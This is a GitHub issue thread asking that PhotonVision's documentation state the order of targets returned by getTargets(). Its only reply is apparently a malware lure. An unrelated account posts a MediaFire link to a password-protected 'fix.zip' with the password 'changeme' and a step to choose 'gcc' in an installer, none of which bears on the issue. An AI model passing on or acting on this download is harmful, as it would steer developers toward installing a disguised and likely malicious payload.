### ISSUE TITLE
Specify getTargets() order in documentation

### ISSUE THREAD

**Issue by kaiyamashita08** [PhotonVision/photonvision#1403]
The getTargets() description [here](https://docs.photonvision.org/en/latest/docs/programming/photonlib/getting-target-data.html#getting-a-list-of-targets) and [here](https://javadocs.photonvision.org/org/photonvision/targeting/PhotonPipelineResult.html#getTargets()) both don't describe in what order the targets are returned

After I asked the question in the discord, I was told that "It’s the same order as the UI, which is set by the target sort mode," so putting a quick explanation in the docs would be helpful.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
